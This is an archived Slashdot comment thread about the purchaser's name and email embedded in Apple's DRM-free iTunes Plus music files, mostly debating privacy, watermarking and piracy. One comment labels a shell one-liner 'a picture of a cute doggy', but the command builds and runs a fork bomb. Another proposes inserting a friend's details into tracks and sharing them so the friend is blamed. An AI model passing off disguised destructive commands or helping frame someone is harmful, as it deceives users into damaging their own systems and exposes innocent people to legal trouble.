Slashdot Mirror
iTunes DRM-Free Files Contain Personal Info
r2k writes "Apple's iTunes Plus files are DRM-free, but sharing the files on P2P networks may be an extremely bad idea. A report published by CNet highlights the fact that the account information and email address of the iTunes account holder is hidden inside each and every DRM-free download. I checked, and I found I couldn't access the information using an ID3 tag editor, but using Notepad I found my email address stored inside the audio file itself."
I don't see the problem. I didn't want them to remove DRM so I could ignore the copyright on the music, I wanted them to remove it so I could use it on any device I wanted to listen to it on. They did that; now I can, as far as I'm concerned, we're all good now.
If you interpret the lack of DRM as permission to ignore copyright, and you end up in trouble because you did so...
Nope, don't see the problem.
Good grief. "Sharing" copyrighted music files on a P2P network was always an extremely bad idea. If you ever had any fraction of an excuse for doing it (and frankly, I don't really think you did, but...) it is gone now, at least as far as iTunes purchases go. What has changed is it is now reasonable to purchase music, because you'll actually get to own it, use it on *all* your gear, back it up, etc.
The only thing I can think of that is really affected by this is your ability to legitimately resell recording of a tune you own, because you bought it. And for that issue, I give it.... maybe an hour before someone comes up with a tool to ZOT that name and email address right out of there. Maybe it'll even put the new one in. Pride of ownership and all that.
I've fallen off your lawn, and I can't get up.
so what happens when you send it to someone else in a "hey check out this song" kind of way, then that person is stupid and sticks it in their lime wire folder?
Never again buy anything related to music and you'll be safe.
Alternatively, you can buy music in small stores, in cash. In that case, it's better to wear sunglasses and a hat. You wouldn't want anyone to discover you're one of those people who actually are paying clients of the music industry.
-insert anti-trust suits-
I completely agree. Having bought CD's from Artsists where my name is "in" the CD (for this reason of tracking) I can happily say I have no problem with it.
It's not DRM, it's just saying "this CD was bought by x" for when it hits the internets.
(the artist was classic aussie electronic band Severed Heads, btw, for those interested. Another internet audio pioneer)
Just so long as the music industry doesn't come back in 10 years with new lawsuits targeting little-old-lady-X because 10 mil. people somehow ended up with 'pirated' copies of music with her name in it.
Since this watermark must be fairly easy to modify, I can't really see how useful it would be in tracking piracy. It could probably have some uses for marketing research. Though, honestly, I can't think of any myself...
You can see the info within iTunes.
Get Info on the Song/Video/Etc
Then go to the Summary Tab, Second column.
I've bought a few songs and checked them. My personal information is only on the itunes files. I converted the m4a files to mp3's using itune's built in file converter and I do not see any of my personal information in them, at least in plain text.
This has been the case for AGES
http://business.timesonline.co.uk/tol/business/industry_sectors/media/article1871173.ece
Or at least for about a year and a half, I think slashdot reported on it then, too.
1. Open mp3 with text editor 2. Find and replace your email with 3. Upload.
the account information and email address of the iTunes account holder is hidden inside each and every DRM-free download
How is this "hidden"? If you select an audio file purchased from the iTunes Store (with or without DRM), and go to File->Get Info, you'll see the following fields in the summary:
Purchased by:
Account Name:
Purchase Date:
Apple's not trying to hide anything here.
to see if they actually did used to for enforcement how would they track someone down and on what basis would they press charges? Yeah your email was in that file. hell anyone could change the email using some tool and upload stuff. The whole thing seems pointless.
http://yro.slashdot.org/article.pl?sid=07/05/30/2014222
I think it's OK. Even if I really buy from iTunes to burn a cd as gift, at that point the account info will be gone, so what's the matter?
1) Download DRM-free song from iTunes
2) Open in Notepad, Find and replace email address, Save
3) Share on p2p network of choice
4) ???
5) Profit !!!
$ strings FTP.EXE | grep Copyright
@(#) Copyright (c) 1983 The Regents of the University of California.
If some form of steganography is used to alter a file, then somewhere and in some way the quality of that file will be compromised. Bitmaps lose sharpness, audio files lose certain audio data.
.doc and .xl and other files, that they were willing to hack the software to disable that feature. No doubt there will be people equally pissed off at iTunes for doing a similar thing.
A big part of the problem is that you are not getting the product you ordered. You are getting a product that has been altered in a significant way.
There are people who were pissed enough at Microsoft for embedding personal information in their
I do feel there is room for bitching here. If I order a product, don't make significant alterations to it, especially by putting my personal information in it without my permission! I do not have to have criminal intent to feel that this is an invasion!!!
In many places, it's perfectly legal to share you music collection. Here in Canada we pay a tax on recordable media for that right.
I doubt it will take that long for a utility to come out to remove the info though.
How hard would it be for someone start spreading mp3's with someone elses information in it, and then make RIAA sue them when they find the first one?
Granted that the situation might be solved when Apple checks whether or not this person ("purchased by", "account name", "purchase date") actually bought the song but still it might cause a lot of trouble for someone.
I think this is not a good idea. iTunes should store these separately in some meta-files...
I suppose it's pertinent again and all, but seriously, I already know this guys, why are we pretending like this is new?
On some level, I'm not sure why i care if it's repeat news. I mean really, repeat it all you want i guess, my life still goes on, but i dunno, journalistic integrity and all that, i feel like we should at least mention that this is a complete copy of an older story....
-Taylor
Worldwide Military budgets: $2100 billion. Worldwide Space Exploration budgets: $38 billion. Really, world? Really?
Only thing more we could ask for is a warning hwen you download it, but that's not important.
It'll play on anything I put it on, I can share a copy with a friend or burn a few mix CDs.
I'm usually a big Apple critic and I hate DRM, but this is fine by me.
93rd rule of Slashdot: No matter how obvious my sarcasm is, my comment will be taken seriously by someone.
how can they prove that the email address in the file wasn't placed there by someone else?
I don't think that would last long as evidence in court, especially if some bright spark changes the email in the tag to steve.jobs@apple.com
I can imagine that this is part of the deal with the music industry. They might have said: ok, you may drop the DRM but if we find one of those DRM free files on a file sharing network we want to know who did it. Or maybe Steve offered this as compromise to the industry. Maybe he even exploited the industries apparent lack of understanding new technologies and told them it's a watermark. Well, probably not. But imagining the background stories that might have lead to things like "personal info in DRM-ree files" is fun!
What if someone copies your music without your permission, then those files get onto the net. Let's not get into a tangent on how likely that is, just accept that it can and will happen (friends (or non-friends) borrow songs, hackers get into your computer, etc). Having seen RIAA's questionable legal practices, this could cause alot of grief for the person who legally purchased the songs.
Some independent online stores (like Junodownloads) also say they watermark tracks, but I haven't been able to verify it so far. I don't know what kind of watermarking these stores use (if any) but embedding customers email in the files is clearly a bully move from Apple.
"Wanna leak our files on p2p? How about we leak your personal info? It would be too bad if some spammer found a way to harvest all those valid email addresses from itunes files.... too bad really..."
Guess what? If I buy music, I also want to be able to share it with my friends (friends!=p2p) without being traced on ending up sued.
Buying cds/vinyls and ripping them might still be the way to go in the end... Or are we going to have to pay an ever bigger premium for non-watermarked digital files?
This is an almost 2 year old story: Apple's DRM Whack-a-Mole (Posted by CmdrTaco on 10.06.2007 17:08)
If it bothers you to have an identifying tag in your music files, well remove it or overwrite it.
As far as I understand, it's stored in a standard MP4 atom.
And if you don't know how to do it, ask Google, or try this suggestion which explains how to use AtomicParsley for windows or mac.
This post is clickable. But I'm scared to do it.
I'd believe you, but Iraq is over. Nobody is afraid to go there anymore. Most troops consider it a vacation from the hassle filled life they live in the US.
To put in in easy to understand terms, bombs are easier to live with than inspections and training. That's how much of a failure the insurgency is.
It's not an MP3 file, so metadata isn't stored by cobbling ID3 on to the audio data. It's an MP4 file, so this information is stored in (and can be removed as, using AtomicParsely or similar) MP4 atoms.
This came up when they introduced iTunes plus ages ago. It's been discussed back then. Yes, the info is there. You can simply look it up, no problem. Your ID3-Tag-Editor might not be able to chanxge it since we're not talking MP3 here. That's it.
Just use a different editor, clean out the information and start the copyrightinfringement-frenzy you seem to have been waiting for for so long. Oh no, you already do that, I guess.
Or, if you don't like finding an editor that can delete the info, just go to a record store and steal the CD.
This is the only example I can think of where the rights of the copyright holder are protected without causing any inconvenience to the legitimate user.
As others have pointed out though, the files need to be water-marked in a way that cannot be forged (for the sake of the customer) or easily removed (for the sake of the copyright holder). The removability part is the problem of course, since steganography is easily overcome by simply using steganography on the file again.
Then again, its probably as effective as any other form of DRM (Fairplay can be removed by the original purchaser) and at least it doesn't affect the user.
As others have said, this is not a bad thing if you respect the property of copyright holders. Nevertheless it won't take long before some 31337 h4x0rz figure out exactly where the information is stored and zero it out. Copy protection technology is like the lock on your front door. It keeps honest people honest. To the 31337 h4x0rz it's just another challenge. I'll tell you why you SHOULD respect copyright and copyright holders. You like free software? Doubtless you use free software? The free software licenses that guarantee the freeness of those programs are based on copyright law. Without copyright, that software would be in the public domain, many features added to distributed copies would never show up in source form, and you'd be stuck with jack diddly squat. So if you respect free software, then you should respect copyright.
Sharing is legal in Canada (unless Bill C-61 ever passes, which looks doubtful thankfully).
Oh sure. They can properly store your email and IP Address in an audio file, but yet every time I press "See What Other Bands Match Your Criteria" while listening to Metallica, I still get Ace of Base and Yanni as suggestions
>=(
So... if I keep the music I purchased for private use private, I have no privacy violation? Right?
Also, despite the summary's between the lines implication that Apple is hiding the info from ID3 tag editors, the audio files are MPEG4. This means they don't contain ID3 tags. Since MPEG4 is based on QuickTime, a QuickTime atom editor will happily show you the tags and let you remove them.
You could also have guessed the purchaser info was in these files based on the fact that iTunes shows it to you if you get info on a song.
Hush, this is slashdot, truth and reason have NO place here! Where is your sensationalism, where is your "Oh noes, the whole world is out to get me!" type statements. You and your rational arguments should just go and find another home!
Monstar L
Is this an issue from your past?
What are you talking about?
"RIAA is the litigious groups of assholes"
Yes...I agree...as for the remainder, WTF?
Really, I don't understand...explain, please?!?
Persons A&B both seem to have symmetrical access...Am I missing something?
(mod's==stay away-I am really wanting to know what's going on here)
Down With Slashdot BETA!!! I've been around the corner and seen the oliphant; you can only abuse me from your perspecti
Not only is this old, as many have pointed out, but there is even a Perl module (Audio::M4P::QuickTime) which has a dedicated function for that: CleanAppleM4aPersonalData.
I don't see a problem with this. Apple is providing a file without DRM, and you can then load it on any of your personal devices. Heck, you could even share it with a friend.
But, it might make you a little more careful NOT to put music files you purchase from Apple on a P2P network. Sheesh. It might add a little value to those files you downloaded at a buck a piece. It'll be worth it to you to keep those files safe.
And why not? People should be safeguarding their personal data.
And think about it.. if your iPod were stolen, and all of your files had an email address on it. It could help with the recovery of stolen property, hm?
Sure, so long as they make it abundantly clear that this is what they're up to.
Is this the case? I assume it isn't, because Slashdot and others are acting all surprised about it.
No sig today...
But the privacy to say;
Me: Hey! I have no idea where that ABBA album comes from!
is gone sine the can say:
friend: Hahaha! but it says right her you bought it last summer.
"Waterloo, finally facing my privacyooo!"
Yeah, those sort of reasonable and balanced statements are disturbing. Where am I going to find my daily dose of "OMG all these evil corporate/government bastards are out to take away all my privacy and sue me to bankrupcy and persecute me for doing innocent stuff what sort of dystopian future is this world coming toooooo" now?
You just got troll'd!
Some people may share files that say:
Purchased by 'Steve Jobs sjobs@apple.com' :)
Hope you never have your iPod/iTouch/iPhone/computer stolen then...
Or someone steals your iPod. How many iPod's get stolen every year? You can get your bottom dollar that this is a none zero number. Someone willing to steal a iPod is likely to have no compunctions about sharing the songs they find on them with others.
Way to sensationalize something which has been known for years. Everything that is purchased on iTunes is stamped with user account and a unique transaction ID. Apps, videos, movies, rentals, etc.
It doesn't bother me because I don't share my music on p2p networks and I'm not paranoid like some people. I dislike DRM because I want to easily play my music on whatever device I want, not because of some ideological drive to stick it to THE MAN.
This is a non-issue.
i.e., when the first batch of DRM-free 'choons' came out, the purchaser's info was in there; ditto the DRM'd stuff-- the tools to strip the DRM out of the file still left the personal information in the file (as of course, you were stripping the DRM for freedom to play on any device, not for piracy. Of course).
Is this even news? I'm sure I heard this a year ago. And I don't really care. It gives me the freedom I deserve and I don't care about the metadata. Although, being more open about it would have been better.
Of course, since you won't be sharing the files with anyone, it doesn't matter that they contain personal information, does it? Watermarking has always been a far better way of discouraging file-sharing than encumbering files with unwieldy and crippling DRM that restricts your ability to play the files when and where you choose.
So if anyone comes asking you just tell them you lost your iPod.
If they ask about your computer tell them you have (had) a trojan, and/or that you keep your wireless open for guests.
In any case I'm happy as I can use my files as I want now, and never intended to share them anyway.
I contemplated a similar scheme for software. A kind of "social DRM" if you like. But it's not water proof either: if you find your application (or song, in this case) on a torrent site and see that it was purchased by John Doe, what would you do? Go after him? There would still be the burden of proof that he actually put it there. If he says "well somebody somehow got the application off my computer" then I'm sure you'd have a hard time proving malicious intent.
Your second attack scenario is interesting but you missed something in your dismissal of the first.
> That scenario still comes under "making available,"
As mentioned above, if RIAA download these files from Person C's computer (C having downloaded it via P2P) and find out during discovery that Person C is not Person A, they might well think they have a case against Person A for distributing to Person C.
It may or may not be illegal, but it's practically impossible to do anything about it even if it is.
Regardless, it'd be perfectly legal for me to let you have a copy of my iTunes library, and what you do with it then is out of my control.
and you can get rid of:
Simply by saying; "We made some music, would you like some? take it, it's free" Eben Moglen
Oh Brother, "When will they ever learn? When will they ever learn?" (Song)
Regards Slasdotgirl
The more I know, the less I know
Seriously, how hard is it? Can't you just record the audio while it plays, then, save it as an mp3 with a 192kb sample rate? Perfect!
I'm fine with the basic concept here. I can accept that music isn't generally open source or FOSM. What I wanna know is: if I pay a dollar to buy a digital song, how much of that dollar actually finds its way into the wallet of the artist? If most of that dollar is going into the overly fat wallet of a middleman, I am NOT fine with that.
Whining, bitching and moaning. Another /. day...
I don't usually troll (or try not to) but what kind of numbnuts is surprised or offended by this. And the hypotheticals (what if I lost a HDD with only music, I'd be recognizable) are so moronic that I had to catch my breath before ranting.
What imbeciles.
We have the choice of buying non crippled music with our monogram on super conveniently, buy crippled music conveniently or buy (usually) non-crippled music inconveniently (CDs, mail order or brick and mortar store).
Buy the music in the form that suits you. I'll keep using iTMS because it's convenient and because it's relatively fair.
But then I have this funny feeling that the people bitching the most over this are probably not buying music that much. But may have large music libraries anyway.
Just fucking buy the stuff you really like, ok. Support the artists you feel truly excel.And not another goddamned whine about your purchase having your name printed on it.
Fucking whiners.
Sorry but he would be better going to Las Vegas or perhaps standing under trees on hills in thunderstorms than subscribing to your fear mongering. Get real, first Apple has an inherent desire to ensure they don't do it wrong because as a business if it can be proven in court they did screw up; lets be real here, if they do screw up it won't be one person and it won't be very hush hush on the net; they will be out some money.
Otherwise, if that file you purchased ends on the net and you don't know why then you have to ask yourself, what are your kids, so, roommates, etc, doing with your stuff while your not home? Let me guess, that would not be your responsibility.
I don't care how many stupid never likely to happen scare scenarios you can come up with, it never excuses you. You come across like the type who wants an note handed to them "yes Timmy, you can pirate music because it is a scary world out there and someone might use super secret squirrel technology and upload files from your computer to the interweb without your knowing, while you sleep"
LOL.
Insightful? Damn it makes me worry when I see tripe like yours rated such. (flame on I have the karma to burn)
* Winners compare their achievements to their goals, losers compare theirs to that of others.
And you're supposed to be HAPPY????
Tell you what, I'll pay in canadian dollars rather than US. It's currency and it's called "dollar" so it's a high quality legal tender. Just not worth as much as the US dollar (currently).
What? You're not happy? OK, I'll use the Australian dollar.
What???
Huh, you're never satisfied.
That doesn't mean that there are loads of other instances inside crypted... ;)
I report it and if it is found later being used in a getaway, I am not at fault.
But when it comes to a music file, if I lose it, I am at fault.
Nice.
Wanker.
And people sell old devices without erasing the drives first, how many used ipods or hard drives are on ebay full of mp3 files?
http://spamdecoy.net - free throwaway anonymous email - avoid spam!
I checked, and I found I couldn't access the information using an ID3 tag editor
All iTunes songs are AAC or Apple Lossless. ID3 is used almost exclusively for MP3 and certainly not for any iTunes song.
I'm not at all surprised by this. What surprises me is that they have used a plain text encoding to store the details.
I would have expected a more sophisticated steganography technique so the user details were embedded directly into the music itself. This would effectively be impossible to detect and remove, and would only be visible to Apple.
Wait...perhaps they already have? The plain text could just be a decoy.
How many people who steal iPods then upload the music on said iPod to a P2P network? How many people who steal iPods know how to get the music off the iPod in the first place?
I'm guessing that number is pretty damn close to zero.
Besides, if you've filed a police report, in the very unlikely event of this sequence of events occuring, and you ending up at the barrel of a lawsuit for it, you can show that the iPod (presumably containing said songs) was stolen.
iTunes Plus is, what, a year and a half old? And this was never any kind of secret. And I'm sure that's not the only tracking info in the file... when you download iTunes Plus it does a heck of a lot of computation on the file after it's downloaded.
You think Amazon's downloader doesn't do the same thing, easily visible or not?
It's a picture of a cute doggy.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
The reason I don't like this is because of First Sale Doctrine. I should be able to sell these files the same way I'd sell a CD (ie, not keeping a copy). So if I sell them, and delete them, and the person I sell them to decides it's a good idea to Pirate Bay them, now what? My email address is all over the place and I did nothing illegal. Great.
So while I support Apple for going DRM free, for the time being I'll continue to buy from Amazon because they do none of this nonsense. See http://blog.wired.com/music/2007/09/some-of-amazons.html "there is no information on the tracks that identifies the customer".
So until I have a very quick and easy way of removing that info from the iTunes tracks, I won't be buying from there.
-S
--- What parts of "shall make no law", "shall not be infringed", and "shall not be violated" don't you understand?
Oh noes! my laptop with all my itunes music on it just got stolen. Now, my email address will be all over the internets.....
Way old news. See http://arstechnica.com/news.ars/post/20070530-apple-hides-account-info-in-drm-free-music-too.html from 2007
With the apparent difference that they are up-front about it.
There is that nightmare scenario of getting your player stolen. Just try to get the cops to stay awake long enough to write out a report, make sure you have a full and complete list, and when the RIAA comes calling for their million dollars, make sure you say, "But my player was stolen!".
They covered this when the DRM-Free stuff came out.
We saw this before. I'm pretty sure it's the same thing that happened when they released $2 drm free versions of some of their music.
If you find the iPod of a young student, won't the email address be the "purchaser," i.e., the holder of the credit card used to purchase the songs? Wouldn't that luring email likely go to the parents of the student (and likely get you in trouble)?
This came to light when they first started itunes plus, and was a /. story then.
Do you have ESP?
Seriously? When you upgrade 400 tracks to iTunes Plus and you half to wait a half-hour for the e-mail saying your songs are ready, what do you think it's doing? Duh, watermarking the files with your info before letting you download them.
And if you think the only cases where your info is encoded are the ones you can see with hexdump, I've got a Zune Phone to sell you.
FWIW, I also write books for the Pragmatic Programmers, and this is exactly how their PDF program operates: when there's an updated PDF, you have to have your personal copy generated at their website, with a prominent "Prepared Exclusively for Joe Developer" at the bottom of every page.
It's a perfectly reasonable system that enables all kinds of appropriate uses (using your tunes in personal Final Cut / iMovie projects, for example), and it's not evil just because Apple does it (sorry, Slashtards).
.
So the scenario where a fake address is inserted is a very real possibility.
Now you can buy all your music all over again. Only this time, you can get a 75% discount! Woohoo! I am so going to rush out and do that. Fortunately, all my music is on a server encoded in Ogg Vorbis.
Excuse me, but please get off my Pennisetum Clandestinum, eh!
... because maybe your ISP was partially bought out, and the old owner doesn't allow the new owner to use the domain name?
now we need to go OSS in diesel cars
I'd be pretty scared about owning any watermarked or otherwise personally-identifiable files. Even if I stay totally within the law and never give it to anybody, it means I have a file sitting on my computer which I must make sure nobody ever gets.
As in, if someone, possibly a hacker, were to steal a confidential Word document from my PC, that might be bad.
If someone were to steal a watermarked MP3 file from my PC (or, say, a whole album of such files), and it then finds its way out onto the Internet, I could potentially be fucked over. From what we see all the time here, I could lose my house if the RIAA really wanted me to.
It means once I have purchased these files, I have to be eternally vigilant. The security of those MP3 files is potentially one of the more important things on my PC. This really isn't something the average consumer is thinking about when they purchase music.
Combine that with an OS like Windows, on which it is the norm for rogue programs to run wild opening backdoors everywhere, and you have an unfortunate situation for consumers.
It shouldn't be too hard to create a batch mp3 file cleaner that can wipe all of this info from batches of mp3 files. No?
Change the email address and information to the names of people in the RIAA and then put it up on the p2p networks. Could make a utility that does it for your whole library.
1. Replace your personal info with that of some friend.
2. Share a metric ton of these mp3 on pirate bay.
3. Enjoy as your friend burns in flames and their life is ruined.
4. There isn't a step number 4.
But... the future refused to change.
So...what about Amazon MP3 downloads for example?? Do they have similar info embedded?
Everyone acts like iTunes is the only place to get DRM free music...
It IS the "800 lb. gorilla", but there are a few 80 lb. chimpanzees out there you could try.
Doug
I suppose if you buy your stuff from Apple, you deserve the pitfalls associated with being a consumer guinea pig.
Hey, someone must have 'stole' the files from my PC. I didn't share anything, oh, and prove i did.
I know, its not technically theft if the originals are left intact, but since people cant seem to figure out the difference its the word i used.
---- Booth was a patriot ----
On a trusted machine, use some Free Software to convert the song to an open format that either doesnt support the storing of 'extra' information (or at the very least, exposes all such information and allows for editing same), then re-encode the file to the desired format, again using Free Software on a trusted machine.
Why, hello there embedded infomation. I'd like to introduce you to my friend the hex editor. You two should get on swimmingly!
Esoteric reference.
I mean, seriously, if you want to implement digital right protection, you either do it completely (hint : you can't) or not at all. Partial implementation like this one are completely useless.
I see this mentality all the time, the mentality that "if it isn't perfect, it might as well not be there". This mentality is just wrong.
The idea that writing your name on a piece of paper is a security device is just stupidly silly, yet this concepts is the very foundation of our legal and financial systems. The idea that policing the population with less than 1 active cop for every 10,000 citizens will dramatically reduce crime is just dumb, yet it really works.
I could go on all day with other examples like security checks at airports, but I don't need to - security isn't a situation where you are either secure or not secure, it's a relativistic situation where things are more secure or less secure.
Yes, DRM has always been crackable, there has always been the "security hole" at the speakers and screen, etc. but the truth is that many people don't have the skills to change/remove their email address, wouldn't bother with registering a fake name, and so wouldn't circumvent the security built into the itunes files.
And we have no way of knowing whether or not the obvious email address embedded in the file is all there is, either - there could be any number of ways that this information could be embedded in other, less obvious ways, much like the obscured vehicle ID number that's tapped into your car's frame that protects you right this very second from having your car stolen.
Security doesn't have to be perfect. It just has to be good enough to be effective.
I have no problem with your religion until you decide it's reason to deprive others of the truth.
Cool! Apple is using Social DRM on their music files.
---dragoness
Correct me if I'm wrong, but didn't this issue come up back when Apple first released DRM-Free songs?
To add to that, the post is misleading, it's not actually hidden unless you are a complete and utter tool. In the info window of iTunes, it clearly shows the information they have "hidden" in the file...
So... if I keep the music I purchased for private use private, I have no privacy violation? Right?
Well, no. You seem to have fallen hook line and sinker for the RIAA's line and don't seem to even know it.
I suspect much of slashdot is similar, given the responses to this dupe. I guess I am still stuck in the "old days" when I could share my music with my friends. [note: someone you have never met 1200 miles away does not count as your "friend"]. Be it a mix tape, a compilation CD, a usb key, an external hard drive or a darknet, private use is still private use. Somewhere we lost this in the onslaught.
So, yes, possible privacy violation, but that begs the question as to what should truly be considered private use. I believe I should have the ability to hand my friend a compliation and tell them "Hey - check these guys out!"
So I don't believe it is simply a matter of "Don't Share!" (or as your said keep private stuff private) which is the party line of the RIAA and that you are defending.
put on p2p... what happens?
You still have your songs (on your computer).
But they are also out in the wild.
I've lost/had stolen a couple cheap mp3 players over the last 7 years.
She was like chocolate when she drank... semi-sweet at first and then increasingly bitter.
RIAA: Hey, I just found Dr. Dre's Fuck You on the torrents. In AAC format, too!
Lawyer: Ok, I've got the suit generator fired up. Give me the contact info.
RIAA: Lets see... The email is obama@whitehouse.gov, purchased 5 days ago.
Lawyer: We really need to get a life.
Are there any takers for a bet as to how long it will be before someone has a tool to remove this cruft from the files? I give it two weeks, now that the word is out... I BUY a lot of music, but I refuse to purchase anything that has personally identifiable information embedded in it, like iTunes. The right to privacy should still mean something. I don't think they are even encrypting this stuff in any meaningful way.
At first we complained that CDs were overpriced and it was too inconvenient to find good music, that's why we were pirating it online. Companies put it online more cheaply and half the people went legit. The rest of us had to fall back on other excuses.
Next we complained that the DRM on these new digital files restricted our legal rights to play the music in the ways we saw fit. "It's not that we want to pirate it," we clamored, "it's just that we don't want to be treated like criminals!" So Amazon and iTunes (eventually) removed the DRM and we could play our music whenever, wherever, and however they wished. Half of the remaining holdouts rejoiced and went legit; the rest have to find new excuses.
Allow me to offer my suggestions for your remaining options:
"I want the ability to temporarily share or permanently sell my music to other people and I don't trust them not to upload the files."
"The identifying information on the files could be used maliciously by a third party to get me in trouble."
"Amazon/iTunes/RIAA is evil and giving them money is supporting evil. I do, however, support independent labels and bands by buying their products. (not just talking about it on slashdot.)"
"The formats provided are too lossy. I only keep files in [favorite format] at [obscene bitrate/lossless]"
"I fundamentally believe that I shouldn't have to pay for music and my other arguments are just rationalizations to lend an air of credibility to my position."
In conclusion, it's been a fun ride but this is my stop. I'm happy: my demands have been met. You guys will have to go the rest of the way on your own and I wish you the best of luck. But I don't hold out much hope. At a certain point it's not worth it for Amazon/iTunes/RIAA to bend over backwards trying to convince the last holdouts. On the positive side, that means you can cling to whatever rationalization you want for as long as you want!
While I do not have a big problem with this as I only wanted the right to use these files they way I wanted to, this information is truly useless and may be dangerous. For one thing the lack of DRM means that one would only need to convert it to another format to remove it so it has no impact only pirates with a brain. Second and perhaps more disturbing, a malicious person could change this information to incriminate someone with ease. This last issue relates to the third, the existence of files with your e-mail is so flimsy of evidence that you committed a crime that it may be possible to squash it in court and a person may sue if they lose access because of it.
The submitter is a real 1337 Hax0r. Ever hear of strings? Vi? I know the Apple apologists are out on full force on this thread (as usual -- 'omg Steve Jobs is personalizing my tracks for me, how thoughtful!'), but I have to disagree with them -- http://bulletinthehead-wakeup.blogspot.com/2007/05/apple-turning-into-law-enforcement-one.html And yes, this is an old story.
There is a very simple solution to this. Never, ever, ever, buy music from iTunes. Acquire them from other places and load them into iTunes for syncing. That's it.
Besides, if you've filed a police report, in the very unlikely event of this sequence of events occuring, and you ending up at the barrel of a lawsuit for it, you can show that the iPod (presumably containing said songs) was stolen.
And if they do find your files on the net somewhere, they'll know the IP address of the guy who stole your iPod.
Lars T.
To the guy who modded me down from perfect to terrible Karma - Apple haters still suck
I only see one issue in this. First its not new, its always been that way. With music that is DRM'ed even if it was shared on a P2P network it couldn't be played with out the password. The issue I see coming up one day, soon perhaps is a lost ipod of a older generation (like the one I own) that has its songs ripped off of it using one of the many tools out there to do so. The person finding the ipod, and ripping the songs off of it could share it out and the original owner would look like he shared it out. This is a valid issue because now the songs can be played by who ever downloads it. Recently about 6 months ago I found a iPod Nano and the library was pretty good so I picked a few songs off of it with a utility. Those songs are now in my library and none of them where ever bought in iTunes, I suspect they where all downloaded songs to begin with but had they been from itunes the users info would be in the songs to and any one I shared it with would have the songs with the info and sooner or later it might have ended up on a P2P. That said I posted a note outside my door saying lost ipod found, email me if its yours. Please include a few songs on it and the color and type of ipod it is so I know its yours. I never got any emails with that up for a week. The good thing about having the info in the songs is if an honest person finds a lost ipod it will make it easier to contact the person to give it back. Because I already have 4 ipods I had no need for a extra ipod and would have been glad to give it back to the poor kid who lost it. So the RIAA will still need to prove in the future a person intestinally made there songs available to the online community in order to get any conviction. Just because a song has a email address or other info does not automatically mean a crime was committed by that person as there has to be intent or proof they did it. Other methods of losing songs - MP3/AAC CD stolen from car, or lost - Unauthorized access and coping from computer hard drive. A pesky brother could do that and share with friends. - Replaced hard drive with the old one not being erased right - Sold used computer and a recovery program used to restore files (ive done this too) - Stolen computer that didn't have a password on it
First, it's old news, they've always done this on DRMed and DRM-Free tracks.
Second... what's wrong with putting your name on things you own? Remember when your mom made wrote your name on the tags of all your clothes? :)
Why, no, I haven't meta-moderated lately. Thanks for asking!
Posted by CmdrTaco on 10.06.2007 17:08
"Gulf News has a nice piece exposing the last couple generations of Apple's DRM strategy (you didn't really think they were abandoning DRM, did you?). Article focuses on how quickly the tactics are worked around, and how nasty the latest one is: purchased iTunes now have your personal data in them. Author suspects that this is to prevent you uploading them to a network."
Apple Hides Account Info in DRM-Free Music
Posted by ScuttleMonkey on 30.05.2007 22:17
"Apple launched iTunes Plus earlier today, the fruit of its agreement with EMI to sell DRM-free music. What they didn't say is that all DRM-free tracks have the user's full name and account e-mail embedded in them. Is this to discourage people from throwing the tracks up on their favorite P2P platform? 'It would be trivial for iTunes to report back to Apple, indicating that "Joe User" has M4As on this hard drive belonging to "Jane Userette," or even "two other users." This is not to say that Apple is going to get into the copyright enforcement business. What Apple and indeed the record labels want to watch closely is, will one user buy music for his five close friends?'"
The discussions brought up the same predictions of doom (by the same people sometimes) - and nothing of the kind has happened yet.
Lars T.
To the guy who modded me down from perfect to terrible Karma - Apple haters still suck
Then copy the song to another PC and see if the same info still appears, in order to check whether the info is embedded in the file itself, or retrieved by iTunes from a separate database.
iTunes always has contained your personal info, even if you rip your own mp3 from a CD, it puts all your account info in the mp3. Which is just plain stupid.
This is a GOOD thing. DRM is a hideous disaster for end-users. When I buy music, I expect it to STAY bought, and to be able to use it on any device I have. DRM just guarantees that someone can take away my music with no judge and no jury.
But recording this information in the music file is a reasonable compromise. I can still play the music on any device I have. Yes, it's a bad idea to copy it to the world, but I never had the legal right to do that anyway. And yes, it'd be good if it were made clearer that this was happening... but this is NOT a big secret.
This isn't a perfect solution, of course. Even if someone has a copy of music originally bought by someone else, that does NOT mean the original buyer did anything illegal. Computers and networks get broken into all the time. Files can be modified to remove markings, or create bogus markings. Also, I believe people should continue to have the right to resell music, just like they can resell books (the "first sale" doctrine)... regardless of any nonsense spouted by the seller. But in the DRM system, a company operated as judge, jury, and executioner, and the company tended to act capriciously. At least with markings (or non-markings) in the file, a court can examine the evidence. It's not perfect, but it's better, and I can live with it better than the "everything's DRM'ed" world.
Now - where's my Ogg support in iTunes/iPods/iPhones? I'm not demanding that they only use Ogg, but they should be able to support Ogg formats (specifically Ogg Vorbis, Ogg FLAC, Ogg Speex, and Ogg Theora). Neither MP3 nor AAC (.m4a) files are open standards. Wikipedia, for example, provides audio files in Ogg and not in MP3 or AAC.
Please tell Apple to add support for Ogg; here's more info about why Apple should support Ogg.
- David A. Wheeler (see my Secure Programming HOWTO)
It *may* be illegal to distribute music online (other copyrighted works are a different story), but it hasn't been tested and it's all but impossible to bring a case to court.
Further, it's perfectly for me to allow people to make copies of my iTunes library. I'm pretty sure you're wrong about the media requirement, but that's not the original owners responsibility in any case.
Once someone else has a copy of my iTunes library, what they do with it is not my responsibility.
Copyright reform in Canada isn't going to happen. It's politically radioactive.
The difference is that you can't make infinite copies of stolen cars and you can potentially prove you weren't driving the car at the time, while it would be very difficult to prove that you didn't share a file.
"When information is power, privacy is freedom" - Jah-Wren Ryel
are you all deaf? not sure if you have noticed this, but listening requires... listening. which, oddly enough, takes practice. those er-6 will put transient problems out front on display with a giant sign saying "bad mp3 encoding".
it's too bad apple doesn't seem to care as much about stolen hardware.... if it did then it might have a way to shut down stolen i-pods when they were re attached to i tunes
Grab a copy of HexFiend (or whatever crap you Windows people use), open your purchased DRM-free file in it, search for your name and email address, and edit it out.
The file still plays just fine.
Don't steal music. :)
Looks like I was mistaken about legal aid being mainly for criminal cases. It does still seem though that the chances of the average person getting any assistance from them is pretty slim in the case of an RIAA lawsuit though. More info available here
Some bring out the best in others, some the worst. Some bring out far more.
If I purchased an LP, 8-track, cassette, CD (I'm older), I could give the media away or even sell it (not retaining a copy for myself). Any investment that I made, I could later sell it to recoup it. Can you give or sell what you purchased from iTunes? Or how about transfer the license to someone else? I could with any other form of media and not have it be traceable back to me. Under the current model, you better make sure that you want it in your collection forever because your going to be stuck with it (Traceable back to you).
